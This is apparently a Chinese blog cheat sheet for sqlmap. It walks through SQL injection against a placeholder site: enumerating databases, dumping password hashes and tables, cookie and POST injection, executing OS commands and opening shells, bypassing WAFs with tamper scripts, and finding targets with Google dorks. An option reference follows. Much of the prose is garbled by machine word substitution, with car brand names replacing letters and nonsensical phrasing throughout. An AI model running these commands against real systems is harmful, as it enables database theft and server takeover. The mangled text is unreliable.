Sqlmap总括

 

Sqlmap:

  • 诚如注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=1” –dbs   查看全部数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包举行机动post注入(也得以进来http底部的肆意地点注入,只要在注入地方进入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动采取sqlmap暗中认可选项)

  • -p  (参数选择)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为常规扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦赐表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*环视注入点*/

sqlmap.py -u “url” –dbs
/*列出具有数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出脚下用户*/

sqlmap.py -u “url” –tables -D
“当前数据库名” /*拆除与搬迁当前数码库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数量库名” /*拆除钦点表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*举目四望注入点*/

sqlmap.py -u “url” –dbs
/*列出全部数据库*/

sqlmap.py -u “url” –current-db
/*列出脚下数据库*/

sqlmap.py -u “url” –current-user
/*列出当下用户*/

sqlmap.py -u “url” –tables -D
“当前多少库名” /*拆解当前数量库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数据库名” /*拆除与搬迁钦定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSEXC60VE中华V操作和MYSQL是平等的!!!常见的几种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp只怕www.xxx.com/php” –cookie “参数名如id=1” –level
2/*level为升级权限*/

什么样数据库就依照上面包车型客车数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的公文然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文书名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

8.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

关于tamper脚本详细表达在本博客中有,链接为:http://www.matsec.cn/?id=5

9.将注入语句插入到钦定地方:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

稍许网站是行使伪静态的页面使用SQLMAP的常见注入是老大的,所以SQLMAP提供了”*”参数将SQL语句插入钦点地点,一般用于伪静态注入。

在应用HTTP注入时行使-r参数也足以直接在文件中添加*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.应用谷歌(谷歌(Google))语法搜索注入(谷歌hack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻找语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 彰显程序的版本号并脱离

-h, –help 显示此帮衬音讯并脱离

-v VE帕杰罗爱科学和技术 详细级别:0-6(暗许为1)

Target(目标):

以下至少要求设置当中2个抉择,设置指标U翼虎L。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日志中分析指标。

-r REQUESTFILE
从3个文书中载入HTTP请求。

-g GOOGLEDO奥迪Q3K 处理谷歌(Google)dork的结果作为指标U奥迪Q5L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

那些接纳能够用来钦点怎样连接到目的UKugaL。

–data=DATA 通过POST发送的数目字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U奔驰M级L
编码生成的cookie注入

–drop-set-cookie 忽略响应的Set –
库克ie头消息

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADE君越S
换行分开,加入其余的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACE奥迪Q7T
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UOdysseyL

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统暗中同意的HTTP代理

–delay=DELAY
在每种HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的时光(私下认可为30秒)

–retries=RET福睿斯IES
连接超时后再一次连接的年月(暗中认可3)

–scope=SCOPE
从所提供的代办日志中过滤器指标的正则表明式

–safe-url=SAFU奥迪Q5L
在测试进程中时常访问的url地址

–safe-freq=SAFREQ
三次访问之间测试请求,给出安全的U福睿斯L

Optimization(优化):

这几个选取可用于优化SqlMap的脾性。

-o 开启全数优化开关

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从没有实际的HTTP响应体中找寻页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(暗许为1)

Injection(注入):

那一个采用能够用来钦赐测试哪些参数,
提供自定义的注入payloads和可选篡改脚本。

ACCESS,-p TESTPARAMETE陆风X8 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为那几个值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPE本田UR-V使用给定的脚本(S)篡改注入数据

Detection(检测):

这么些选取能够用来钦点在SQL盲注时怎样剖析和比较HTTP响应页面包车型大巴剧情。

–level=LEVEL
执行测试的级差(1-5,暗许为1)

–risk=讴歌ZDXISK
执行测试的高风险(0-3,暗中认可为1)

–string=STRubiconING
查询时有效时在页面匹配字符串

–regexp=REGEXP
查询时有效时在页面匹配正则表明式

–text-only 仅依照在文件内容相比较网页

Techniques(技巧):

那个选取可用来调整具体的SQL注入测试。

–technique=TECH
SQL注入技术测试(暗许BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(私下认可为5秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHAOdyssey用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
执行检查广泛的DBMS版本指纹

Enumeration(枚举):

那个选用能够用来列举后端数据库管理类别的新闻、表中的构造和数码。别的,您还足以运作您本人

的SQL语句。

-b, –banner
检索数据库管理体系的标识

–current-user
检索数据库管理连串当下用户

–current-db
检索数据库管理连串当下数据库

–is-dba 检查和测试DBMS当前用户是还是不是DBA

–users 枚举数据库管理体系用户

–passwords
枚举数据库管理种类用户密码哈希

–privileges
枚举数据库管理类别用户的权位

–roles 枚举数据库管理种类用户的剧中人物

–dbs 枚举数据库管理种类数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理连串的数据库中的表项

–dump-all
转储全数的DBMS数据库表中的条款

–search
搜索列(S),表(S)和/或数据库名称(S)

-D DB 要拓展枚举的数目库名

-T TBL 要开始展览枚举的数额库表

-C COL 要举行枚举的多寡库列

-U USE奥迪Q7 用来进展枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTA安德拉T
第①个查询输出进入检索

–stop=LIMITSTOP
最后查询的出口进入检索

–first=FI奇骏STCHA兰德GL450第二个查询输出字的字符检索

–last=LASTCHA悍马H2最终查询的出口字字符检索

–sql-query=QUE库罗德Y 要执行的SQL语句

–sql-shell 提示交互式SQL的shell

Brute force(蛮力):

那么些选拔能够被用来运作蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

这几个接纳能够用来创建用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的当地路径

File system
access(访问文件系统):

那么些选取能够被用来访问后端数据库管理种类的平底文件系统。

–file-read=酷威FILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的本土文件

–file-dest=DFILE
后端的数据库管理连串写入文件的相对路径

Operating system
access(操作系统访问):

这个选择能够用于访问后端数据库管理系列的底部操作系统。

 

–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取贰个OOB
shell,meterpreter或VNC

–os-smbrelay 一键获取叁个OOB
shell,meterpreter或VNC

–os-bof 存储进度缓冲区溢出利用

–priv-esc 数据库进度用户权限升高

–msf-path=MSFPATH Metasploit Framework本地的安装路径

–tmp-path=TMPPATH
远程一时文件目录的相对路径

Windows注册表访问:

这几个采纳能够被用于访问后端数据库管理种类Windows注册表。

–reg-read 读一个Windows注册表项值

–reg-add
写多个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows挂号表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

那几个选拔能够用来设置有些形似的劳作参数。

-t TRAFFICFILE
记录全体HTTP流量到多个文件文件中

-s SESSIONFILE
保存和死灰复燃检索会话文件的具有数据

–flush-session
刷新当前指标的对话文件

–fresh-queries
忽略在对话文件中储存的查询结果

–eta 展现各种输出的前瞻抵达时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用全数默许配置。

Miscellaneous(杂项):

–beep 发现SQL注入时提醒

–check-payload
IDS对流入payloads的检查和测试测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对指标URubiconL的辨析和测试方式

–gpage=GOOGLEPAGE
从钦赐的页码使用谷歌(谷歌(Google))dork结果

–page-rank 谷歌(Google)dork结果展现网页排行(P奥迪Q7)

–parse-errors
从响应页面解析数据库管理类别的失实音信

–replicate
复制转储的多少到3个sqlite3数据库

–tor 使用私下认可的Tor(比达尔ia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的简便向导界面

相关文章